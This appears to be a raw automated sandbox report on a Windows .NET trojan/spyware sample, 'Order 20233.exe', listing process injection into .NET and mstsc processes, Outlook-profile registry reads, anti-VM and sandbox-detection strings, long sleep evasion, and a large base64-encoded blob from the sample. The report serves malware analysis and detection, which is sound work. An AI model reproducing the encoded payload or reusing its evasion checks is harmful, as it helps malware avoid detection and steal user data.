Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Jump to behavior

Source: C:\Windows\SysWOW64\mstsc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Order 20233.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Order 20233.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\mstsc.exe

File created: C:\Users\user\AppData\Local\Temp\4184-48M

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@22/2@2/1

Source: Order 20233.exe	Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
Source: C:\Users\user\Desktop\Order 20233.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior

Source: Order 20233.exe, moabGi8lf8iend/moabGu5ss.cs

Base64 encoded string: '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

Source: Order 20233.exe, moabDefe1da1t/moab0ecade.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Order 20233.exe, moabDefe1da1t/moab0ecade.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\Order 20233.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Order 20233.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: C:\Windows\SysWOW64\mstsc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Order 20233.exe

Static file information: File size 1827328 > 1048576

Source: Order 20233.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Order 20233.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1bde00

Source: Order 20233.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Order 20233.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: AddInProcess32.pdb source: mstsc.exe, 00000015.00000002.533525731.00000000054E3000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000011.00000003.308531715.0000000001697000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000003.305774318.00000000014FF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000003.431126939.0000000005003000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000002.531941308.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000003.428147207.0000000004E69000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000002.533058558.00000000052BF000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000011.00000003.308531715.0000000001697000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000003.305774318.00000000014FF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000003.431126939.0000000005003000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000002.531941308.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000003.428147207.0000000004E69000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000002.533058558.00000000052BF000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: mstsc.pdbGCTL source: AddInProcess32.exe, 00000011.00000003.416107815.000000000386B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000003.420075103.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: AddInProcess32.pdbpw source: mstsc.exe, 00000015.00000002.533525731.00000000054E3000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: c:\TeamCity\buildAgent\work\5644082abfe4d909\EFBuild\obj\Release\Migrate\migrate.pdb source: Order 20233.exe
Source:	Binary string: mstsc.pdb source: AddInProcess32.exe, 00000011.00000003.416107815.000000000386B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000003.420075103.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Order 20233.exe	Code function: 0_2_000002177258A635 pushfq ; retf	0_2_000002177258A636
Source: C:\Users\user\Desktop\Order 20233.exe	Code function: 0_2_00007FFBAD3881DE push eax; ret	0_2_00007FFBAD3881ED
Source: C:\Users\user\Desktop\Order 20233.exe	Code function: 0_2_00007FFBAD3881C3 pushad ; ret	0_2_00007FFBAD3881DD
Source: C:\Users\user\Desktop\Order 20233.exe	Code function: 0_2_00007FFBAD387F17 push ebx; ret	0_2_00007FFBAD387F1A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018AD0D1 push ecx; ret	17_2_018AD0E4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_004210F9 push eax; ret	17_2_004210FF
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0040A0FE push ds; ret	17_2_0040A104
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_004210AC push eax; ret	17_2_004210FF
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_00421163 push eax; ret	17_2_00421169
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_00421102 push eax; ret	17_2_00421169
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_004082D9 pushad ; ret	17_2_004082DB
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0041B2F7 push edi; ret	17_2_0041B319
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0041AA83 push ecx; ret	17_2_0041AA8A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0040CAAF pushad ; ret	17_2_0040CAB0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0041AABE push ebx; ret	17_2_0041AABF
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0041AB17 push edx; retf	17_2_0041AB26
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0041AC8C push es; retf	17_2_0041AC8D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_00419F2C pushfd ; ret	17_2_00419F2D

Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 20233.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Order 20233.exe PID: 5872, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\Order 20233.exe TID: 6048

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\explorer.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Code function: 17_2_01886B90 rdtsc

17_2_01886B90

Source: C:\Users\user\Desktop\Order 20233.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

API coverage: 8.3 %

Source: C:\Users\user\Desktop\Order 20233.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Order 20233.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: explorer.exe, 00000014.00000000.332547025.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Order 20233.exe	Binary or memory string: krW0yvrDWyLEsalvv9+gJn4HXY2Vl3oUSouBYpABUpILCnMKeZOCp4tGtHKoVCk8NpdWGHrn5rVTmS77oiljOkKoFUpHgfs9AD+dv7F0vkXKD8MG11HzATdEKuZ0Wj8hJq
Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: explorer.exe, 00000014.00000000.359291499.0000000007166000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000014.00000000.332547025.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: explorer.exe, 00000014.00000000.366252688.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000014.00000000.332547025.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000014.00000000.354585161.0000000005063000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000014.00000000.366252688.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe

Code function: 17_2_01886B90 rdtsc

17_2_01886B90

Source: C:\Users\user\Desktop\Order 20233.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0187C182 mov eax, dword ptr fs:[00000030h]	17_2_0187C182
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188A185 mov eax, dword ptr fs:[00000030h]	17_2_0188A185
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01882990 mov eax, dword ptr fs:[00000030h]	17_2_01882990
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018861A0 mov eax, dword ptr fs:[00000030h]	17_2_018861A0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018861A0 mov eax, dword ptr fs:[00000030h]	17_2_018861A0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D69A6 mov eax, dword ptr fs:[00000030h]	17_2_018D69A6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D51BE mov eax, dword ptr fs:[00000030h]	17_2_018D51BE
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D51BE mov eax, dword ptr fs:[00000030h]	17_2_018D51BE
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D51BE mov eax, dword ptr fs:[00000030h]	17_2_018D51BE
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018D51BE mov eax, dword ptr fs:[00000030h]	17_2_018D51BE
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_019149A4 mov eax, dword ptr fs:[00000030h]	17_2_019149A4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_019149A4 mov eax, dword ptr fs:[00000030h]	17_2_019149A4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_019149A4 mov eax, dword ptr fs:[00000030h]	17_2_019149A4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_019149A4 mov eax, dword ptr fs:[00000030h]	17_2_019149A4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0185B1E1 mov eax, dword ptr fs:[00000030h]	17_2_0185B1E1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0185B1E1 mov eax, dword ptr fs:[00000030h]	17_2_0185B1E1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0185B1E1 mov eax, dword ptr fs:[00000030h]	17_2_0185B1E1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_018E41E8 mov eax, dword ptr fs:[00000030h]	17_2_018E41E8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01859100 mov eax, dword ptr fs:[00000030h]	17_2_01859100
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01859100 mov eax, dword ptr fs:[00000030h]	17_2_01859100
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01859100 mov eax, dword ptr fs:[00000030h]	17_2_01859100
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01874120 mov eax, dword ptr fs:[00000030h]	17_2_01874120
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01874120 mov eax, dword ptr fs:[00000030h]	17_2_01874120
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01874120 mov eax, dword ptr fs:[00000030h]	17_2_01874120
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01874120 mov eax, dword ptr fs:[00000030h]	17_2_01874120
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_01874120 mov ecx, dword ptr fs:[00000030h]	17_2_01874120
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188513A mov eax, dword ptr fs:[00000030h]	17_2_0188513A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0188513A mov eax, dword ptr fs:[00000030h]	17_2_0188513A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0187B944 mov eax, dword ptr fs:[00000030h]	17_2_0187B944
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0187B944 mov eax, dword ptr fs:[00000030h]	17_2_0187B944
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0185C962 mov eax, dword ptr fs:[00000030h]	17_2_0185C962
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0185B171 mov eax, dword ptr fs:[00000030h]	17_2_0185B171
